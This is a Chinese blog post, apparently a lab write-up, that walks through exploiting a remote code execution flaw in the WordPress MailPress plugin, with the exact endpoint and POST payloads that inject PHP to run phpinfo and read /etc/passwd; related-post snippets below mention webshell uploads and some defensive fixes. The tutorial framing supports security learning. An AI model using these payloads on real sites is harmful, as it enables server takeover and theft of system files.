WordPress-Mailpress远程代码执行漏洞——利用

最新推荐文章于 2025-07-12 23:10:51 发布
原创 最新推荐文章于 2025-07-12 23:10:51 发布 · 4.5k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍如何利用WordPress MailPress插件中的漏洞创建Web Shell并读取敏感文件。通过安装Firefox插件HackBar,构造特定POST数据提交恶意PHP代码,最终实现远程代码执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

相关资料:

http://www.jeeseen.com/archives/421.html

http://www.xingkonglangzi.com/post-662.html

https://www.exehack.net/3509.html

https://github.com/Medicean/VulApps/tree/master/w/wordpress/2

我的漏洞环境是http://X.X.X.X:18000/(我的便宜安全师父搭的)

一、首先,我使用Firefox,在Firefox里添加一个叫做HackBar的插件:

直接使用Firefox浏览器搜索HackBar,选中第一个点进去


点进去之后添加HackBar到Firefox,然后按照提示重启Firefox就好:


重启之后的Firefox会在顶端多出一点东西:


二、接下来就是利用漏洞了:

按照那些资料提示,我们把URL写到HackBar中(注意这里的URL是你的漏洞环境的ip地址和端口),然后选中enable post data写要提交的数据:

  URL:

 
http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php
post:
action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1


把上一步得到的ID写在下一步的URL中

URL:

http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=上一步得到的ID


到这里该漏洞的基本的利用已经实现

三、师父还留个扩展问题,利用php系统函数去尝试读取 /etc/passwd 文件:

这里就把前面的post数据中subject的数据改掉,改为<?php echo file_get_contents('/etc/passwd')?>

改过后的post数据为:

action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php echo file_get_contents('/etc/passwd')?>&html=&plaintext=&mail_format=standard&autosave=1

相关步骤及结果截图如下:






Wordpress Time-clock 插件 远程代码执行漏洞复现(CVE-2024-9593)
0xSec
10-30 695
Wordpress Time-clock 插件 存在远程代码执行漏洞,通过“etimeclockwp_load_function_recall”函数容易受到远程代码执行的攻击。这允许未经身份验证的攻击者在服务器上执行代码。无法指定被调用函数的参数。
[ 漏洞复现篇 ] WordPress远程代码执行漏洞复现(CVE-2020-25213)
qq_51577576的博客
05-10 1885
WordPress文件管理器(wp-file-manager)插件6.0-6.8版本。php里面的内容其实就是一个PHPinfo。WordPress5.9.3版本更新包。更新至最新版本6.9版本以后的版本,垃圾文件,风险文件上传之后必须删除。安装完jq模块之后再次使用脚本检测。查看hello.php所在位置。使用脚本检查漏洞是否存在。...
wordpress漏洞getshell
qq_59671410的博客
03-20 203
1.在docker启动靶场,使用9595端口,访问。4.我们在网络搜索可得,该PHP文件的目录位置。5.我们拼接url,访问该页面,访问成功。3.我们输入一句话木马,并保存。2.发现他的模板文件可以修改。6.用蚁剑尝试连接,成功。
2022信安冬令营day1——WordPress-Mailpress远程代码执行漏洞
m0_54628962的博客
02-16 2645
wordpress 由IP地址进入网页 利用wpscan软件扫描该IP地址发现漏洞Mailpress插件远程代码执行漏洞 Mailpress插件远程代码执行漏洞复现 利用火狐中hackbar插件 F12进入 web控制台,把URL写入hackbar中,选中Post data键,传入post值,运行 URL: http://IP地址:端口/wp-content/plugins/mailpress/mp-includes/action.php POST:action=autosave&id=0&
WordPress网站PHP信息泄露漏洞分析与修复建议
最新发布
weishi122的专栏
07-12 246
漏洞赏金猎人的扫描过程中,发现网站存在PHP信息泄露页面。该页面暴露了服务器PHP环境的敏感配置细节,攻击者可利用这些信息实施针对性攻击。
WordPress-Mailpress远程代码执行漏洞
冷冷的oO
02-16 3459
在kali中使用火狐浏览器打开靶场192.168.7.200,看到题目。 访问题目给出的网址192.168.7.100。 在终端中使用WPScan扫描网址: 输入命令wpscan --url IP 然后扫描结果中显示Interesting Findings,仔细观察。 在这里我们主要对mailpress rce漏洞进行复现,找到flag。 步骤: 1.安装HackBar插件,浏览器右上角菜单-首选项-左下角扩展与主题-搜索,按F12/Fn+F12可使用插件. 2.调出插件,输入URL和要提交的数据
WordPress-Mailpress远程代码执行漏洞复现
Ping_Pig的博客
11-04 2187
插件简介: Mailpress是一个比较流行的邮件插件插件下载Plugin Directory:https://wordpress.org/plugins/mailpress/ 漏洞复现: 漏洞详解地址:https://github.com/Medicean/VulApps/tree/master/w/wordpress/2 Docker镜像地址: docker pull m...
WordPress远程命令执行
harker_20的博客
11-15 1170
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接:https://mp.youkuaiyun.com/mdeditor/103079416 漏洞信息 漏洞编号:CVE-2016-10033 漏洞简述:WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用漏洞就能实现远程代码执行,针对目标服务器实现即时访问,...
Vulfocus-WordPress远程命令执行(CVE-2016-10033)
qq_52178795的博客
06-11 1055
漏洞名称:WordPress远程命令执行(CVE-2016-10033)漏洞描述:WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞(CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用远程攻击者可以利用漏洞执行代码。当WordPress 使用 PHPMailer 组件向用户发送邮件。
漏洞分析 | WordPress Backup Migration远程代码执行漏洞(CVE-2023-6553)
WangsuSecurity的博客
04-25 1169
Backup Migration 小于1.3.8版本中存在远程代码执行漏洞,该漏洞在CVSS3.1中评分9.8,危险等级为危急
WordPress 5.0.0远程代码执行漏洞研究.pdf
09-09
研究者们通过对WordPress 5.0.0远程代码执行漏洞的深入分析,发现了不同于现有公开分析的利用方式。他们指出,这种利用方式可以更直接地导致任意代码的执行,从而加剧了漏洞的危险性。文章强调,对开源软件漏洞的...
WordPress-Mailpress插件远程代码执行漏洞
Jim的博客
09-07 1085
漏洞利用:subject=
[Vulfocus解题系列] WordPress远程命令执行(CVE-2016-10033)
00勇士王子的博客
07-07 2771
漏洞介绍 名称: wordpress 远程代码执行 (CVE-2016-10033) 描述: WordPressWordpress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。 WordPress 4.6 远程代码执行漏洞漏洞主要是 PHPMailer 漏洞(CVE-2016-10033)在 WordPress Core 代码中的体现,该漏洞不需要任何的验证和插件,在默认的配置情况下就可以利用远程攻击者可以利用漏洞执行代码。 影响版本 WordPr
WordPress 远程命令执行漏洞
weixin_47493074的博客
10-01 633
WordPress 远程命令执行漏洞
WordPress漏洞
2302_80982453的博客
03-20 553
2,在如图所示的位置选择一个php文件写入一句话木马,我们这里选择在404.php中写入。2,下载一个主题包,并将一句话木马压缩到主题包的压缩文件中进行上传,然后进行访问。3,访问404.php。1,找到如图所示的页面。1,安装好靶场后访问。
php wordpress漏洞,wordpress 4.6远程代码执行漏洞环境搭建
weixin_39942033的博客
03-25 404
这篇文章主要是记录下搭建漏洞测试环境的过程,然而从中午开始,断断续续的一直折腾到凌晨,只是搭建了成功了本地能复现的环境,并没有实现远程复现。究其原因,主要是固执到一直想用daocloud来搭建测试环境,坑好多,花了太多时间来填坑了,记录下过程。docker pull wordpress:4.6-php5.6-apachedocker pull daocloud.io/library/mysql:5...
WordPress5.0.0 远程代码执行
nuaa_llf的博客
03-04 4031
原文链接:https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ 这篇博文讲述了利用目录穿越和本地文件包含漏洞的“组合拳”在WordPress核心功能实现远程代码执行。过去6年,该WordPress漏洞一直未被揭示。 影响 【POC视频1】 攻击者需要在目标WordPress网站拥有至少作者级权限的账户,然后就...
WordPress--漏洞复现
weixin_57682301的博客
08-03 701
3.将文件内容改为我们的一句话木马,点击更新文件。4.访问这个文件显示出phpinfo证明注入成功。1.搭建好环境进入后台登录界面登录管理员。2.进入后选择外观---编辑。
最新WordPress插件漏洞,影响超过700万个网站
w3cschools的博客
03-18 588
研究人员已经披露了多个WordPress插件中的漏洞,如果成功利用这些漏洞,则攻击者可以在某些情况下运行任意代码并接管网站。 这些缺陷已在Elementor(一个用于超过700万个网站的网站构建器插件)和WP Super Cache(用于服务WordPress网站的缓存页面的工具)中发现。 据国际知名白帽黑客、东方联盟创始人郭盛华透露:该错误与一组存储的跨站点脚本(XSS)漏洞(CVSS评分:6.4)有关,该漏洞是在将恶意脚本直接注入易受攻击的Web应用程序时发生的。 在这种情况下,由于在服务器端
wordpress插件远程代码执行漏洞
07-07
WordPress插件中的远程代码执行(RCE)漏洞是一个严重的安全问题,可能导致攻击者在受影响的系统上执行任意代码。以下是几个典型的漏洞案例及其分析与修复方案。 ### WordPress Social Warfare 组件 RCE 漏洞 在 `\wordpress\wp-content\plugins\social-warfare\lib\utilities\SWP_Database_Migration.php` 文件中,`debug_parameters()` 函数使用了 `eval()` 来执行用户提供的参数,并且未对输入进行严格的过滤或验证。这使得攻击者可以通过构造恶意请求来执行任意 PHP 代码 [^2]。 **修复方案:** - 更新到最新版本的 Social Warfare 插件- 如果无法更新,请手动修补 SWP_Database_Migration.php 文件,移除或禁用 `eval()` 的使用。 - 对所有外部输入数据进行严格的验证和清理,避免直接执行未经处理的数据。 ```php // 示例:移除 eval() 使用 function debug_parameters($options) { // 不推荐使用 eval() // $result = eval($options); // 替代方案:记录调试信息而不是执行 error_log("Debug options: " . print_r($options, true)); } ``` ### Formidable Forms 和 Shortcodes Ultimate 组合插件 RCE 漏洞 Formidable Forms 允许非授权用户预览表单,但未对上传的 HTML 内容进行充分检查,导致潜在的 XSS 和 shortcode 执行风险。当与支持自定义 shortcode 的 Shortcodes Ultimate 插件结合时,这种缺陷可能被利用来实现远程代码执行 [^3]。 **修复方案:** - 确保 Formidable Forms 和 Shortcodes Ultimate 都更新至最新版。 - 禁止非授权用户访问敏感功能,如表单预览。 - 在处理用户提交的内容时,实施严格的输入验证机制,例如白名单过滤和输出编码。 ```php // 示例:对用户输入进行过滤 function sanitize_user_input($input) { return htmlspecialchars(strip_tags($input), ENT_QUOTES, 'UTF-8'); } ``` ### WordPress 主题库本地文件包含导致 RCE 漏洞 通过路径遍历攻击覆盖特定 Post Meta 条目,攻击者可以将恶意文件绑定到合法的 Post Meta 上,从而触发远程代码执行 [^4]。 **修复方案:** - 升级 WordPress 至 5.0.1 或更高版本以获得官方补丁。 - 审查并加固服务器上的文件权限设置,确保只有受信任的用户才能修改关键文件。 - 实施 Web 应用防火墙 (WAF),监控和阻止异常请求。 ```php // 示例:加强文件包含逻辑的安全性 function secure_include($filename) { if (!file_exists($filename)) { throw new Exception('File not found.'); } // 只允许包含指定目录下的文件 if (strpos(realpath($filename), WP_CONTENT_DIR) !== 0) { throw new Exception('Access denied to requested file.'); } include $filename; } ``` ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值